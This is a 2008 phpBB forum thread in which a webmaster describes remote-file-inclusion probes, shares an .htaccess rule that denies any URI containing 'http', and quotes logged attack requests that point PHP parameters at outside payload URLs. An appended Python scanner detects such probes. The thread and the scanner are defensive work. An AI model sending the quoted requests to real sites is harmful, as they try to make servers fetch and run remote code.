An Tir Chirurgeon's Guild Message Board Forum Index An Tir Chirurgeon's Guild Message Board
The online community of the An Tir Chirurgeonate.

Numerous Hack attempts from eclub.lv

Conal
Master Chirurgeon


Joined: 15 Dec 2004
Posts: 138
SCA Branch: Shire of Drygestan, Kingdom of the Outlands

Posted: Tue Mar 25, 2008 7:24    Post subject: Numerous Hack attempts from eclub.lv

Well, taking a look at the server logs over the past few days, we've been inundated with hack attempts coming from a server in Latvia that is sending requests for certain files on our server, and appending them with a website address, usually something like "maryswedding.eclub.lv/images?" or "partygirl.eclub.lv/images/pictureofme?" Don't try following these links - trust me, you don't want to! Most likely you'll just get a dump of their code, but if by some chance your machine has a vulnerability, you'll get hacked.

My guess is that they are trying to exploit a security hole on certain types of forum, blog, or shopping cart software that would cause the software to execute the code that is waiting at the end of the url they're pointing to.

Our code is immune to the hack, but it's causing dozens of entries per hour to show up in my server logs while they hammer away at the gates.

Sadly, the attacks are not coming from any specific ip block. It looks like they are part of a zombie attack, as they come from IP addresses all over the world, so I can't just block an IP range and be done with it.

In order to solve the problem, and keep them from even getting to the gates, I've modified our htaccess file by inserting the following lines:

Code:
# 25 March 2008 - Block http://(.*)eclub.lv/images? hack attempts        #
<FilesMatch "^(.*)http(.*)$">
   Order allow,deny
   Deny from all
   Satisfy All
</FilesMatch>

This works by matching any URI that contains http in it. When that happens, the code within the <FilesMatch> block executes, issuing a "Deny from all", and ending the issue once and for all with a "403 - Access Denied" response.

I could have set it to match eclub.lv, but I get the idea that these morons will eventually get kicked off of eclub.lv, and have to go elsewhere. Since they must have the "http://" in the URI they're trying to load in order to make their nasty little trick work, blocking any URI with http in it will work for any variant they come up with. Mind you, some systems might legitimately be passing a url using a $get command, like this:

Code:
http://www.mydomain.com/newsite.php?site=http://www.anothersite.com"

In which case this <FilesMatch> would whack that process, as the URI would come out to "/newsite.php?site=http://www.anothersite.com", and you'd get a 403. If that's the case, you'll need a regex to match something else specific to the URI - like <FilesMatch "^(.*)eclub\.lv(.*)$">.

Fortunately, on our system this will never happen, so I'm using the shotgun method, and blocking any attempt to load a file with http as part of the URI.

Now, this information is pretty dull for anyone who doesn't play in the web arena, but I'm putting this info up here on our public area so that other webmasters that might come across this problem can fix the headache without having to repeat the research.
_________________
THLord Conal MacNachtan

"The age of chivalry is never past, so long as there is a wrong left unredressed on earth, or a man or woman left to say, I will redress that wrong, or spend my life in the attempt."
Charles S. Kingsley, Life (vol. II, ch. XXVIII)

http://www.cafepress.com/conalscorner - Because it's not just something we do on the weekend.
Conal
Master Chirurgeon


Joined: 15 Dec 2004
Posts: 138
SCA Branch: Shire of Drygestan, Kingdom of the Outlands

Posted: Fri Mar 28, 2008 6:27    Post subject: Horatius at the gate.

Well, I'm glad that I chose to use brute force blocking of all uri requests containing "http" instead of just looking for "eclub.lv". We've caught about a hundred odd attempts on the same theme trying to get in since I put the block up:

Code:
GET /chi-news.phphttp://myweddingphotos.by.ru/images? HTTP/1.1
GET /aboutus.php/middle.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1
GET /vol-prot.php/protection.php?action=logout&siteurl=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1
GET //articles.php?PageURL=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1
GET /aboutus.php/aboutus.php?page=http://clanx.clanservers.com/modules/vwar/convert/can?? HTTP/1.1
GET /index.php/index.php?aid=http://12.30.229.109/images/.../di?? HTTP/1.1

They all received a nice big "403 - Access Denied.", courtesy of the .htaccess file - our Horatius at the gate, keeping the Etruscans at bay.
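As an added illustration (not code from the forum or from phpBB), here is a small log scanner that flags the kind of remote-file-inclusion probes shown in both posts above: request lines whose path or query-string values carry an absolute URL, including the percent-encoded form. The log lines and client addresses are constructed for the example; the request URIs follow the ones quoted in the thread, and the `allowed_params` option covers the legitimate `?site=http://...` case raised in the first post.

```python
# Added example, not the forum's or phpBB's own code: flag remote-file-inclusion
# probes of the kind shown in the thread, i.e. request URIs whose path or
# query-string values carry an absolute URL. Log lines and IPs are constructed.
import re
from urllib.parse import parse_qsl, unquote

# Apache combined-log prefix: only client IP, request line and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# Match an embedded scheme anywhere; no \b anchor, so "chi-news.phphttp://" is caught.
SCHEME_RE = re.compile(r'(?i)(?:https?|ftp)://')

def is_rfi_attempt(request_line, allowed_params=()):
    """True if the URI embeds a remote URL in its path or in a query value.

    allowed_params names query keys that legitimately carry URLs (the
    ?site=http://... case from the first post); their values are not checked.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return False
    path, _, query = parts[1].partition('?')
    if SCHEME_RE.search(unquote(path)):
        return True
    # parse_qsl percent-decodes values, so siteurl=http%3A%2F%2F... is seen as ://
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key not in allowed_params and SCHEME_RE.search(value):
            return True
    return False

def scan_log(lines, allowed_params=()):
    """Return (ip, status, request) for each log line that looks like an RFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group('req'), allowed_params):
            hits.append((m.group('ip'), m.group('status'), m.group('req')))
    return hits

# Constructed sample log: request lines follow the thread's examples, the client
# addresses are documentation-range placeholders, not real attackers.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2008:06:27:00 -0800] "GET /chi-news.phphttp://myweddingphotos.by.ru/images? HTTP/1.1" 403 212',
    '198.51.100.23 - - [28/Mar/2008:06:27:04 -0800] "GET /aboutus.php/middle.php?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 403 212',
    '198.51.100.23 - - [28/Mar/2008:06:27:05 -0800] "GET /vol-prot.php/protection.php?action=logout&siteurl=http%3A%2F%2Fwww.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 403 212',
    '192.0.2.44 - - [28/Mar/2008:06:28:10 -0800] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Mar/2008:06:28:11 -0800] "GET /newsite.php?site=http://www.anothersite.com HTTP/1.1" 200 980',
]

if __name__ == '__main__':
    for ip, status, req in scan_log(SAMPLE_LOG, allowed_params=('site',)):
        print(ip, status, req)
```

Run against a real access log, the scanner reports the probes regardless of whether the .htaccess rule answered them with a 403, which makes it a quick check that the block is actually firing.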


Powered by phpBB © 2001, 2005 phpBB Group
Content and Layout © 2004-2006 William J. Knight, All Rights Reserved.